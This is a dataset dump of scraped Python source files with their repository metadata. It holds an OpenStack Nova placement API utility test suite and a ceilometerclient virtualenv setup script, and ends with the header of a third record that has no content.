Dataset columns:

| column | type | range / notes |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 4 to 1.02M |
| ext | string | 8 distinct values |
| lang | string | 1 distinct value |
| max_stars_repo_path | string | length 4 to 209 |
| max_stars_repo_name | string | length 5 to 121 |
| max_stars_repo_head_hexsha | string | length 40 |
| max_stars_repo_licenses | list | length 1 to 10 |
| max_stars_count | int64 | 1 to 191k, nullable |
| max_stars_repo_stars_event_min_datetime | string | length 24, nullable |
| max_stars_repo_stars_event_max_datetime | string | length 24, nullable |
| max_issues_repo_path | string | length 4 to 209 |
| max_issues_repo_name | string | length 5 to 121 |
| max_issues_repo_head_hexsha | string | length 40 |
| max_issues_repo_licenses | list | length 1 to 10 |
| max_issues_count | int64 | 1 to 67k, nullable |
| max_issues_repo_issues_event_min_datetime | string | length 24, nullable |
| max_issues_repo_issues_event_max_datetime | string | length 24, nullable |
| max_forks_repo_path | string | length 4 to 209 |
| max_forks_repo_name | string | length 5 to 121 |
| max_forks_repo_head_hexsha | string | length 40 |
| max_forks_repo_licenses | list | length 1 to 10 |
| max_forks_count | int64 | 1 to 105k, nullable |
| max_forks_repo_forks_event_min_datetime | string | length 24, nullable |
| max_forks_repo_forks_event_max_datetime | string | length 24, nullable |
| content | string | length 4 to 1.02M |
| avg_line_length | float64 | 1.07 to 66.1k |
| max_line_length | int64 | 4 to 266k |
| alphanum_fraction | float64 | 0.01 to 1 |
hexsha: cf932b6b1aef935c1e708c38eef6e7cbd0b0f792 | size: 33,196 | ext: py | lang: Python
max_stars: path=nova/tests/unit/api/openstack/placement/test_util.py, repo=cloudscale-ch/nova, head_hexsha=4b4e005c639204f2c680eda61131a6930379d70e, licenses=["Apache-2.0"], count=1, stars_event=2018-05-27T09:38:17.000Z to 2018-05-27T09:38:17.000Z
max_issues: path=nova/tests/unit/api/openstack/placement/test_util.py, repo=liyingjun/nova, head_hexsha=dcdcb273606f52093f812b8f0903da404b15732b, licenses=["Apache-2.0"], count=null, issues_event=null
max_forks: path=nova/tests/unit/api/openstack/placement/test_util.py, repo=liyingjun/nova, head_hexsha=dcdcb273606f52093f812b8f0903da404b15732b, licenses=["Apache-2.0"], count=null, forks_event=null
content:
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for the utility functions used by the placement API."""
import datetime
import fixtures
import microversion_parse
import mock
from oslo_middleware import request_id
from oslo_utils import timeutils
import webob
import six
from nova.api.openstack.placement import lib as pl
from nova.api.openstack.placement import microversion
from nova.api.openstack.placement.objects import resource_provider as rp_obj
from nova.api.openstack.placement import util
from nova import test
from nova.tests import uuidsentinel
class TestCheckAccept(test.NoDBTestCase):
"""Confirm behavior of util.check_accept."""
@staticmethod
@util.check_accept('application/json', 'application/vnd.openstack')
def handler(req):
"""Fake handler to test decorator."""
return True
def test_fail_no_match(self):
req = webob.Request.blank('/')
req.accept = 'text/plain'
error = self.assertRaises(webob.exc.HTTPNotAcceptable,
self.handler, req)
self.assertEqual(
'Only application/json, application/vnd.openstack is provided',
str(error))
def test_fail_complex_no_match(self):
req = webob.Request.blank('/')
req.accept = 'text/html;q=0.9,text/plain,application/vnd.aws;q=0.8'
error = self.assertRaises(webob.exc.HTTPNotAcceptable,
self.handler, req)
self.assertEqual(
'Only application/json, application/vnd.openstack is provided',
str(error))
def test_success_no_accept(self):
req = webob.Request.blank('/')
self.assertTrue(self.handler(req))
def test_success_simple_match(self):
req = webob.Request.blank('/')
req.accept = 'application/json'
self.assertTrue(self.handler(req))
def test_success_complex_any_match(self):
req = webob.Request.blank('/')
req.accept = 'application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
self.assertTrue(self.handler(req))
def test_success_complex_lower_quality_match(self):
req = webob.Request.blank('/')
req.accept = 'application/xml;q=0.9,application/vnd.openstack;q=0.8'
self.assertTrue(self.handler(req))
class TestExtractJSON(test.NoDBTestCase):
# Although the intent of this test class is not to test that
# schemas work, we may as well use a real one to ensure that
# behaviors are what we expect.
schema = {
"type": "object",
"properties": {
"name": {"type": "string"},
"uuid": {"type": "string", "format": "uuid"}
},
"required": ["name"],
"additionalProperties": False
}
def test_not_json(self):
error = self.assertRaises(webob.exc.HTTPBadRequest,
util.extract_json,
'I am a string',
self.schema)
self.assertIn('Malformed JSON', str(error))
def test_malformed_json(self):
error = self.assertRaises(webob.exc.HTTPBadRequest,
util.extract_json,
'{"my bytes got left behind":}',
self.schema)
self.assertIn('Malformed JSON', str(error))
def test_schema_mismatch(self):
error = self.assertRaises(webob.exc.HTTPBadRequest,
util.extract_json,
'{"a": "b"}',
self.schema)
self.assertIn('JSON does not validate', str(error))
def test_type_invalid(self):
error = self.assertRaises(webob.exc.HTTPBadRequest,
util.extract_json,
'{"name": 1}',
self.schema)
self.assertIn('JSON does not validate', str(error))
def test_format_checker(self):
error = self.assertRaises(webob.exc.HTTPBadRequest,
util.extract_json,
'{"name": "hello", "uuid": "not a uuid"}',
self.schema)
self.assertIn('JSON does not validate', str(error))
def test_no_additional_properties(self):
error = self.assertRaises(webob.exc.HTTPBadRequest,
util.extract_json,
'{"name": "hello", "cow": "moo"}',
self.schema)
self.assertIn('JSON does not validate', str(error))
def test_valid(self):
data = util.extract_json(
'{"name": "cow", '
'"uuid": "%s"}' % uuidsentinel.rp_uuid,
self.schema)
self.assertEqual('cow', data['name'])
self.assertEqual(uuidsentinel.rp_uuid, data['uuid'])
class QueryParamsSchemaTestCase(test.NoDBTestCase):
def test_validate_request(self):
schema = {
'type': 'object',
'properties': {
'foo': {'type': 'string'}
},
'additionalProperties': False}
req = webob.Request.blank('/test?foo=%88')
error = self.assertRaises(webob.exc.HTTPBadRequest,
util.validate_query_params,
req, schema)
self.assertIn('Invalid query string parameters', six.text_type(error))
class TestJSONErrorFormatter(test.NoDBTestCase):
def setUp(self):
super(TestJSONErrorFormatter, self).setUp()
self.environ = {}
# TODO(jaypipes): Remove this when we get more than a single version
# in the placement API. The fact that we only had a single version was
# masking a bug in the utils code.
_versions = [
'1.0',
'1.1',
]
mod_str = 'nova.api.openstack.placement.microversion.VERSIONS'
self.useFixture(fixtures.MonkeyPatch(mod_str, _versions))
def test_status_to_int_code(self):
body = ''
status = '404 Not Found'
title = ''
result = util.json_error_formatter(
body, status, title, self.environ)
self.assertEqual(404, result['errors'][0]['status'])
def test_strip_body_tags(self):
body = '<h1>Big Error!</h1>'
status = '400 Bad Request'
title = ''
result = util.json_error_formatter(
body, status, title, self.environ)
self.assertEqual('Big Error!', result['errors'][0]['detail'])
def test_request_id_presence(self):
body = ''
status = '400 Bad Request'
title = ''
# no request id in environ, none in error
result = util.json_error_formatter(
body, status, title, self.environ)
self.assertNotIn('request_id', result['errors'][0])
# request id in environ, request id in error
self.environ[request_id.ENV_REQUEST_ID] = 'stub-id'
result = util.json_error_formatter(
body, status, title, self.environ)
self.assertEqual('stub-id', result['errors'][0]['request_id'])
def test_microversion_406_handling(self):
body = ''
status = '400 Bad Request'
title = ''
# Not a 406, no version info required.
result = util.json_error_formatter(
body, status, title, self.environ)
self.assertNotIn('max_version', result['errors'][0])
self.assertNotIn('min_version', result['errors'][0])
# A 406 but not because of microversions (microversion
# parsing was successful), no version info
# required.
status = '406 Not Acceptable'
version_obj = microversion_parse.parse_version_string('2.3')
self.environ[microversion.MICROVERSION_ENVIRON] = version_obj
result = util.json_error_formatter(
body, status, title, self.environ)
self.assertNotIn('max_version', result['errors'][0])
self.assertNotIn('min_version', result['errors'][0])
# Microversion parsing failed, status is 406, send version info.
del self.environ[microversion.MICROVERSION_ENVIRON]
result = util.json_error_formatter(
body, status, title, self.environ)
self.assertEqual(microversion.max_version_string(),
result['errors'][0]['max_version'])
self.assertEqual(microversion.min_version_string(),
result['errors'][0]['min_version'])
class TestRequireContent(test.NoDBTestCase):
"""Confirm behavior of util.require_accept."""
@staticmethod
@util.require_content('application/json')
def handler(req):
"""Fake handler to test decorator."""
return True
def test_fail_no_content_type(self):
req = webob.Request.blank('/')
error = self.assertRaises(webob.exc.HTTPUnsupportedMediaType,
self.handler, req)
self.assertEqual(
'The media type None is not supported, use application/json',
str(error))
def test_fail_wrong_content_type(self):
req = webob.Request.blank('/')
req.content_type = 'text/plain'
error = self.assertRaises(webob.exc.HTTPUnsupportedMediaType,
self.handler, req)
self.assertEqual(
'The media type text/plain is not supported, use application/json',
str(error))
def test_success_content_type(self):
req = webob.Request.blank('/')
req.content_type = 'application/json'
self.assertTrue(self.handler(req))
class TestPlacementURLs(test.NoDBTestCase):
def setUp(self):
super(TestPlacementURLs, self).setUp()
self.resource_provider = rp_obj.ResourceProvider(
name=uuidsentinel.rp_name,
uuid=uuidsentinel.rp_uuid)
self.resource_class = rp_obj.ResourceClass(
name='CUSTOM_BAREMETAL_GOLD',
id=1000)
def test_resource_provider_url(self):
environ = {}
expected_url = '/resource_providers/%s' % uuidsentinel.rp_uuid
self.assertEqual(expected_url, util.resource_provider_url(
environ, self.resource_provider))
def test_resource_provider_url_prefix(self):
# SCRIPT_NAME represents the mount point of a WSGI
# application when it is hosted at a path/prefix.
environ = {'SCRIPT_NAME': '/placement'}
expected_url = ('/placement/resource_providers/%s'
% uuidsentinel.rp_uuid)
self.assertEqual(expected_url, util.resource_provider_url(
environ, self.resource_provider))
def test_inventories_url(self):
environ = {}
expected_url = ('/resource_providers/%s/inventories'
% uuidsentinel.rp_uuid)
self.assertEqual(expected_url, util.inventory_url(
environ, self.resource_provider))
def test_inventory_url(self):
resource_class = 'DISK_GB'
environ = {}
expected_url = ('/resource_providers/%s/inventories/%s'
% (uuidsentinel.rp_uuid, resource_class))
self.assertEqual(expected_url, util.inventory_url(
environ, self.resource_provider, resource_class))
def test_resource_class_url(self):
environ = {}
expected_url = '/resource_classes/CUSTOM_BAREMETAL_GOLD'
self.assertEqual(expected_url, util.resource_class_url(
environ, self.resource_class))
def test_resource_class_url_prefix(self):
# SCRIPT_NAME represents the mount point of a WSGI
# application when it is hosted at a path/prefix.
environ = {'SCRIPT_NAME': '/placement'}
expected_url = '/placement/resource_classes/CUSTOM_BAREMETAL_GOLD'
self.assertEqual(expected_url, util.resource_class_url(
environ, self.resource_class))
class TestNormalizeResourceQsParam(test.NoDBTestCase):
def test_success(self):
qs = "VCPU:1"
resources = util.normalize_resources_qs_param(qs)
expected = {
'VCPU': 1,
}
self.assertEqual(expected, resources)
qs = "VCPU:1,MEMORY_MB:1024,DISK_GB:100"
resources = util.normalize_resources_qs_param(qs)
expected = {
'VCPU': 1,
'MEMORY_MB': 1024,
'DISK_GB': 100,
}
self.assertEqual(expected, resources)
def test_400_empty_string(self):
qs = ""
self.assertRaises(
webob.exc.HTTPBadRequest,
util.normalize_resources_qs_param,
qs,
)
def test_400_bad_int(self):
qs = "VCPU:foo"
self.assertRaises(
webob.exc.HTTPBadRequest,
util.normalize_resources_qs_param,
qs,
)
def test_400_no_amount(self):
qs = "VCPU"
self.assertRaises(
webob.exc.HTTPBadRequest,
util.normalize_resources_qs_param,
qs,
)
def test_400_zero_amount(self):
qs = "VCPU:0"
self.assertRaises(
webob.exc.HTTPBadRequest,
util.normalize_resources_qs_param,
qs,
)
class TestNormalizeTraitsQsParam(test.NoDBTestCase):
def test_one(self):
trait = 'HW_CPU_X86_VMX'
# Various whitespace permutations
for fmt in ('%s', ' %s', '%s ', ' %s ', ' %s '):
self.assertEqual(set([trait]),
util.normalize_traits_qs_param(fmt % trait))
def test_multiple(self):
traits = (
'HW_CPU_X86_VMX',
'HW_GPU_API_DIRECT3D_V12_0',
'HW_NIC_OFFLOAD_RX',
'CUSTOM_GOLD',
'STORAGE_DISK_SSD',
)
self.assertEqual(
set(traits),
util.normalize_traits_qs_param('%s, %s,%s , %s , %s ' % traits))
def test_400_all_empty(self):
for qs in ('', ' ', ' ', ',', ' , , '):
self.assertRaises(
webob.exc.HTTPBadRequest, util.normalize_traits_qs_param, qs)
def test_400_some_empty(self):
traits = (
'HW_NIC_OFFLOAD_RX',
'CUSTOM_GOLD',
'STORAGE_DISK_SSD',
)
for fmt in ('%s,,%s,%s', ',%s,%s,%s', '%s,%s,%s,', ' %s , %s , , %s'):
self.assertRaises(webob.exc.HTTPBadRequest,
util.normalize_traits_qs_param, fmt % traits)
class TestParseQsRequestGroups(test.NoDBTestCase):
@staticmethod
def do_parse(qstring, version=(1, 18)):
"""Converts a querystring to a MultiDict, mimicking request.GET, and
runs parse_qs_request_groups on it.
"""
req = webob.Request.blank('?' + qstring)
mv_parsed = microversion_parse.Version(*version)
mv_parsed.max_version = microversion_parse.parse_version_string(
microversion.max_version_string())
mv_parsed.min_version = microversion_parse.parse_version_string(
microversion.min_version_string())
req.environ['placement.microversion'] = mv_parsed
d = util.parse_qs_request_groups(req)
# Sort for easier testing
return [d[suff] for suff in sorted(d)]
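# parse_qs_request_groups returns a dict keyed by group suffix ('' for the
# unnumbered group, '1', '42', ... for numbered groups), so sorting the keys
# gives the deterministic ordering that the expected lists below rely on.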
def assertRequestGroupsEqual(self, expected, observed):
self.assertEqual(len(expected), len(observed))
for exp, obs in zip(expected, observed):
self.assertEqual(vars(exp), vars(obs))
def test_empty_raises(self):
# TODO(efried): Check the specific error code
self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, '')
def test_unnumbered_only(self):
"""Unnumbered resources & traits - no numbered groupings."""
qs = ('resources=VCPU:2,MEMORY_MB:2048'
'&required=HW_CPU_X86_VMX,CUSTOM_GOLD')
expected = [
pl.RequestGroup(
use_same_provider=False,
resources={
'VCPU': 2,
'MEMORY_MB': 2048,
},
required_traits={
'HW_CPU_X86_VMX',
'CUSTOM_GOLD',
},
),
]
self.assertRequestGroupsEqual(expected, self.do_parse(qs))
def test_member_of_single_agg(self):
"""Unnumbered resources with one member_of query param."""
agg1_uuid = uuidsentinel.agg1
qs = ('resources=VCPU:2,MEMORY_MB:2048'
'&member_of=%s' % agg1_uuid)
expected = [
pl.RequestGroup(
use_same_provider=False,
resources={
'VCPU': 2,
'MEMORY_MB': 2048,
},
member_of=[
set([agg1_uuid])
]
),
]
self.assertRequestGroupsEqual(expected, self.do_parse(qs))
def test_member_of_multiple_aggs_prior_microversion(self):
"""Unnumbered resources with multiple member_of query params before the
supported microversion should raise a 400.
"""
agg1_uuid = uuidsentinel.agg1
agg2_uuid = uuidsentinel.agg2
qs = ('resources=VCPU:2,MEMORY_MB:2048'
'&member_of=%s'
'&member_of=%s' % (agg1_uuid, agg2_uuid))
self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, qs)
def test_member_of_multiple_aggs(self):
"""Unnumbered resources with multiple member_of query params."""
agg1_uuid = uuidsentinel.agg1
agg2_uuid = uuidsentinel.agg2
qs = ('resources=VCPU:2,MEMORY_MB:2048'
'&member_of=%s'
'&member_of=%s' % (agg1_uuid, agg2_uuid))
expected = [
pl.RequestGroup(
use_same_provider=False,
resources={
'VCPU': 2,
'MEMORY_MB': 2048,
},
member_of=[
set([agg1_uuid]),
set([agg2_uuid])
]
),
]
self.assertRequestGroupsEqual(
expected, self.do_parse(qs, version=(1, 24)))
def test_unnumbered_resources_only(self):
"""Validate the bit that can be used for 1.10 and earlier."""
qs = 'resources=VCPU:2,MEMORY_MB:2048,DISK_GB:5,CUSTOM_MAGIC:123'
expected = [
pl.RequestGroup(
use_same_provider=False,
resources={
'VCPU': 2,
'MEMORY_MB': 2048,
'DISK_GB': 5,
'CUSTOM_MAGIC': 123,
},
),
]
self.assertRequestGroupsEqual(expected, self.do_parse(qs))
def test_numbered_only(self):
# Crazy ordering and nonsequential numbers don't matter.
# It's okay to have a 'resources' without a 'required'.
# A trait that's repeated shows up in both spots.
qs = ('resources1=VCPU:2,MEMORY_MB:2048'
'&required42=CUSTOM_GOLD'
'&resources99=DISK_GB:5'
'&resources42=CUSTOM_MAGIC:123'
'&required1=HW_CPU_X86_VMX,CUSTOM_GOLD')
expected = [
pl.RequestGroup(
resources={
'VCPU': 2,
'MEMORY_MB': 2048,
},
required_traits={
'HW_CPU_X86_VMX',
'CUSTOM_GOLD',
},
),
pl.RequestGroup(
resources={
'CUSTOM_MAGIC': 123,
},
required_traits={
'CUSTOM_GOLD',
},
),
pl.RequestGroup(
resources={
'DISK_GB': 5,
},
),
]
self.assertRequestGroupsEqual(expected, self.do_parse(qs))
def test_numbered_and_unnumbered(self):
qs = ('resources=VCPU:3,MEMORY_MB:4096,DISK_GB:10'
'&required=HW_CPU_X86_VMX,CUSTOM_MEM_FLASH,STORAGE_DISK_SSD'
'&resources1=SRIOV_NET_VF:2'
'&required1=CUSTOM_PHYSNET_PRIVATE'
'&resources2=SRIOV_NET_VF:1,NET_INGRESS_BYTES_SEC:20000'
',NET_EGRESS_BYTES_SEC:10000'
'&required2=CUSTOM_SWITCH_BIG,CUSTOM_PHYSNET_PROD'
'&resources3=CUSTOM_MAGIC:123')
expected = [
pl.RequestGroup(
use_same_provider=False,
resources={
'VCPU': 3,
'MEMORY_MB': 4096,
'DISK_GB': 10,
},
required_traits={
'HW_CPU_X86_VMX',
'CUSTOM_MEM_FLASH',
'STORAGE_DISK_SSD',
},
),
pl.RequestGroup(
resources={
'SRIOV_NET_VF': 2,
},
required_traits={
'CUSTOM_PHYSNET_PRIVATE',
},
),
pl.RequestGroup(
resources={
'SRIOV_NET_VF': 1,
'NET_INGRESS_BYTES_SEC': 20000,
'NET_EGRESS_BYTES_SEC': 10000,
},
required_traits={
'CUSTOM_SWITCH_BIG',
'CUSTOM_PHYSNET_PROD',
},
),
pl.RequestGroup(
resources={
'CUSTOM_MAGIC': 123,
},
),
]
self.assertRequestGroupsEqual(expected, self.do_parse(qs))
def test_member_of_multiple_aggs_numbered(self):
"""Numbered resources with multiple member_of query params."""
agg1_uuid = uuidsentinel.agg1
agg2_uuid = uuidsentinel.agg2
agg3_uuid = uuidsentinel.agg3
agg4_uuid = uuidsentinel.agg4
qs = ('resources1=VCPU:2'
'&member_of1=%s'
'&member_of1=%s'
'&resources2=VCPU:2'
'&member_of2=in:%s,%s' % (
agg1_uuid, agg2_uuid, agg3_uuid, agg4_uuid))
expected = [
pl.RequestGroup(
resources={
'VCPU': 2,
},
member_of=[
set([agg1_uuid]),
set([agg2_uuid])
]
),
pl.RequestGroup(
resources={
'VCPU': 2,
},
member_of=[
set([agg3_uuid, agg4_uuid]),
]
),
]
self.assertRequestGroupsEqual(
expected, self.do_parse(qs, version=(1, 24)))
def test_400_malformed_resources(self):
# Somewhat duplicates TestNormalizeResourceQsParam.test_400*.
qs = ('resources=VCPU:0,MEMORY_MB:4096,DISK_GB:10'
# Bad ----------^
'&required=HW_CPU_X86_VMX,CUSTOM_MEM_FLASH,STORAGE_DISK_SSD'
'&resources1=SRIOV_NET_VF:2'
'&required1=CUSTOM_PHYSNET_PRIVATE'
'&resources2=SRIOV_NET_VF:1,NET_INGRESS_BYTES_SEC:20000'
',NET_EGRESS_BYTES_SEC:10000'
'&required2=CUSTOM_SWITCH_BIG,CUSTOM_PHYSNET_PROD'
'&resources3=CUSTOM_MAGIC:123')
self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, qs)
def test_400_malformed_traits(self):
# Somewhat duplicates TestNormalizeResourceQsParam.test_400*.
qs = ('resources=VCPU:7,MEMORY_MB:4096,DISK_GB:10'
'&required=HW_CPU_X86_VMX,CUSTOM_MEM_FLASH,STORAGE_DISK_SSD'
'&resources1=SRIOV_NET_VF:2'
'&required1=CUSTOM_PHYSNET_PRIVATE'
'&resources2=SRIOV_NET_VF:1,NET_INGRESS_BYTES_SEC:20000'
',NET_EGRESS_BYTES_SEC:10000'
'&required2=CUSTOM_SWITCH_BIG,CUSTOM_PHYSNET_PROD,'
# Bad -------------------------------------------^
'&resources3=CUSTOM_MAGIC:123')
self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, qs)
def test_400_traits_no_resources_unnumbered(self):
qs = ('resources9=VCPU:7,MEMORY_MB:4096,DISK_GB:10'
# Oops ---^
'&required=HW_CPU_X86_VMX,CUSTOM_MEM_FLASH,STORAGE_DISK_SSD'
'&resources1=SRIOV_NET_VF:2'
'&required1=CUSTOM_PHYSNET_PRIVATE'
'&resources2=SRIOV_NET_VF:1,NET_INGRESS_BYTES_SEC:20000'
',NET_EGRESS_BYTES_SEC:10000'
'&required2=CUSTOM_SWITCH_BIG,CUSTOM_PHYSNET_PROD'
'&resources3=CUSTOM_MAGIC:123')
self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, qs)
def test_400_traits_no_resources_numbered(self):
qs = ('resources=VCPU:7,MEMORY_MB:4096,DISK_GB:10'
'&required=HW_CPU_X86_VMX,CUSTOM_MEM_FLASH,STORAGE_DISK_SSD'
'&resources11=SRIOV_NET_VF:2'
# Oops ----^^
'&required1=CUSTOM_PHYSNET_PRIVATE'
'&resources20=SRIOV_NET_VF:1,NET_INGRESS_BYTES_SEC:20000'
# Oops ----^^
',NET_EGRESS_BYTES_SEC:10000'
'&required2=CUSTOM_SWITCH_BIG,CUSTOM_PHYSNET_PROD'
'&resources3=CUSTOM_MAGIC:123')
self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, qs)
def test_400_member_of_no_resources_numbered(self):
agg1_uuid = uuidsentinel.agg1
qs = ('resources=VCPU:7,MEMORY_MB:4096,DISK_GB:10'
'&required=HW_CPU_X86_VMX,CUSTOM_MEM_FLASH,STORAGE_DISK_SSD'
'&member_of2=%s' % agg1_uuid)
self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, qs)
def test_forbidden_one_group(self):
"""When forbidden are allowed this will parse, but otherwise will
indicate an invalid trait.
"""
qs = ('resources=VCPU:2,MEMORY_MB:2048'
'&required=CUSTOM_PHYSNET1,!CUSTOM_SWITCH_BIG')
expected_forbidden = [
pl.RequestGroup(
use_same_provider=False,
resources={
'VCPU': 2,
'MEMORY_MB': 2048,
},
required_traits={
'CUSTOM_PHYSNET1',
},
forbidden_traits={
'CUSTOM_SWITCH_BIG',
}
),
]
expected_message = (
"Invalid query string parameters: Expected 'required' parameter "
"value of the form: HW_CPU_X86_VMX,CUSTOM_MAGIC. Got: "
"CUSTOM_PHYSNET1,!CUSTOM_SWITCH_BIG")
exc = self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, qs)
self.assertEqual(expected_message, six.text_type(exc))
self.assertRequestGroupsEqual(
expected_forbidden, self.do_parse(qs, version=(1, 22)))
def test_forbidden_conflict(self):
qs = ('resources=VCPU:2,MEMORY_MB:2048'
'&required=CUSTOM_PHYSNET1,!CUSTOM_PHYSNET1')
expected_message = (
'Conflicting required and forbidden traits found '
'in the following traits keys: required: (CUSTOM_PHYSNET1)')
exc = self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, qs,
version=(1, 22))
self.assertEqual(expected_message, six.text_type(exc))
def test_forbidden_two_groups(self):
qs = ('resources=VCPU:2,MEMORY_MB:2048&resources1=CUSTOM_MAGIC:1'
'&required1=CUSTOM_PHYSNET1,!CUSTOM_PHYSNET2')
expected = [
pl.RequestGroup(
use_same_provider=False,
resources={
'VCPU': 2,
'MEMORY_MB': 2048,
},
),
pl.RequestGroup(
resources={
'CUSTOM_MAGIC': 1,
},
required_traits={
'CUSTOM_PHYSNET1',
},
forbidden_traits={
'CUSTOM_PHYSNET2',
}
),
]
self.assertRequestGroupsEqual(
expected, self.do_parse(qs, version=(1, 22)))
def test_forbidden_separate_groups_no_conflict(self):
qs = ('resources1=CUSTOM_MAGIC:1&required1=CUSTOM_PHYSNET1'
'&resources2=CUSTOM_MAGIC:1&required2=!CUSTOM_PHYSNET1')
expected = [
pl.RequestGroup(
use_same_provider=True,
resources={
'CUSTOM_MAGIC': 1,
},
required_traits={
'CUSTOM_PHYSNET1',
}
),
pl.RequestGroup(
use_same_provider=True,
resources={
'CUSTOM_MAGIC': 1,
},
forbidden_traits={
'CUSTOM_PHYSNET1',
}
),
]
self.assertRequestGroupsEqual(
expected, self.do_parse(qs, version=(1, 22)))
class TestPickLastModified(test.NoDBTestCase):
def setUp(self):
super(TestPickLastModified, self).setUp()
self.resource_provider = rp_obj.ResourceProvider(
name=uuidsentinel.rp_name, uuid=uuidsentinel.rp_uuid)
def test_updated_versus_none(self):
now = timeutils.utcnow(with_timezone=True)
self.resource_provider.updated_at = now
self.resource_provider.created_at = now
chosen_time = util.pick_last_modified(None, self.resource_provider)
self.assertEqual(now, chosen_time)
def test_created_versus_none(self):
now = timeutils.utcnow(with_timezone=True)
self.resource_provider.created_at = now
self.resource_provider.updated_at = None
chosen_time = util.pick_last_modified(None, self.resource_provider)
self.assertEqual(now, chosen_time)
def test_last_modified_less(self):
now = timeutils.utcnow(with_timezone=True)
less = now - datetime.timedelta(seconds=300)
self.resource_provider.updated_at = now
self.resource_provider.created_at = now
chosen_time = util.pick_last_modified(less, self.resource_provider)
self.assertEqual(now, chosen_time)
def test_last_modified_more(self):
now = timeutils.utcnow(with_timezone=True)
more = now + datetime.timedelta(seconds=300)
self.resource_provider.updated_at = now
self.resource_provider.created_at = now
chosen_time = util.pick_last_modified(more, self.resource_provider)
self.assertEqual(more, chosen_time)
def test_last_modified_same(self):
now = timeutils.utcnow(with_timezone=True)
self.resource_provider.updated_at = now
self.resource_provider.created_at = now
chosen_time = util.pick_last_modified(now, self.resource_provider)
self.assertEqual(now, chosen_time)
def test_no_object_time_fields_less(self):
# An unsaved ovo will not have the created_at or updated_at fields
# present on the object at all.
now = timeutils.utcnow(with_timezone=True)
less = now - datetime.timedelta(seconds=300)
with mock.patch('oslo_utils.timeutils.utcnow') as mock_utc:
mock_utc.return_value = now
chosen_time = util.pick_last_modified(
less, self.resource_provider)
self.assertEqual(now, chosen_time)
mock_utc.assert_called_once_with(with_timezone=True)
def test_no_object_time_fields_more(self):
# An unsaved ovo will not have the created_at or updated_at fields
# present on the object at all.
now = timeutils.utcnow(with_timezone=True)
more = now + datetime.timedelta(seconds=300)
with mock.patch('oslo_utils.timeutils.utcnow') as mock_utc:
mock_utc.return_value = now
chosen_time = util.pick_last_modified(
more, self.resource_provider)
self.assertEqual(more, chosen_time)
mock_utc.assert_called_once_with(with_timezone=True)
def test_no_object_time_fields_none(self):
# An unsaved ovo will not have the created_at or updated_at fields
# present on the object at all.
now = timeutils.utcnow(with_timezone=True)
with mock.patch('oslo_utils.timeutils.utcnow') as mock_utc:
mock_utc.return_value = now
chosen_time = util.pick_last_modified(
None, self.resource_provider)
self.assertEqual(now, chosen_time)
mock_utc.assert_called_once_with(with_timezone=True)
avg_line_length: 37.007804 | max_line_length: 79 | alphanum_fraction: 0.575099

hexsha: a11e7847958dcd21f11b7c0dedc55bf1d17e56c0 | size: 2,492 | ext: py | lang: Python
max_stars: path=tools/install_venv.py, repo=citrix-openstack-build/python-ceilometerclient, head_hexsha=c3283ec1e861f29a53c59c1a09f2a1bc21a713e4, licenses=["Apache-2.0"], count=null, stars_event=null
max_issues: path=tools/install_venv.py, repo=citrix-openstack-build/python-ceilometerclient, head_hexsha=c3283ec1e861f29a53c59c1a09f2a1bc21a713e4, licenses=["Apache-2.0"], count=null, issues_event=null
max_forks: path=tools/install_venv.py, repo=citrix-openstack-build/python-ceilometerclient, head_hexsha=c3283ec1e861f29a53c59c1a09f2a1bc21a713e4, licenses=["Apache-2.0"], count=null, forks_event=null
content:
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2010 OpenStack Foundation
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import sys
import install_venv_common as install_venv
def print_help(venv, root):
help = """
Ceilometerclient development environment setup is complete.
Ceilometerclient development uses virtualenv to track and manage Python
dependencies while in development and testing.
To activate the Ceilometerclient virtualenv for the extent of your current
shell session you can run:
$ source %s/bin/activate
Or, if you prefer, you can run commands in the virtualenv on a case by case
basis by running:
$ %s/tools/with_venv.sh <your command>
Also, make test will automatically use the virtualenv.
"""
print help % (venv, root)
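# NOTE: this is a Python 2-era helper; ``print`` is used as a statement above.
# The Python 3 equivalent would be print(help % (venv, root)).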
def main(argv):
root = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
if os.environ.get('tools_path'):
root = os.environ['tools_path']
venv = os.path.join(root, '.venv')
if os.environ.get('venv'):
venv = os.environ['venv']
pip_requires = os.path.join(root, 'requirements.txt')
test_requires = os.path.join(root, 'test-requirements.txt')
py_version = "python%s.%s" % (sys.version_info[0], sys.version_info[1])
project = 'Ceilometerclient'
install = install_venv.InstallVenv(root, venv, pip_requires, test_requires,
py_version, project)
options = install.parse_args(argv)
install.check_python_version()
install.check_dependencies()
install.create_virtualenv(no_site_packages=options.no_site_packages)
install.install_dependencies()
install.post_process()
print_help(venv, root)
if __name__ == '__main__':
main(sys.argv)
avg_line_length: 33.226667 | max_line_length: 79 | alphanum_fraction: 0.712681

hexsha: 44d2e5f1b7e974d3b135805daec957720bdbfaf2 | size: 1,049 | ext: py | lang: Python
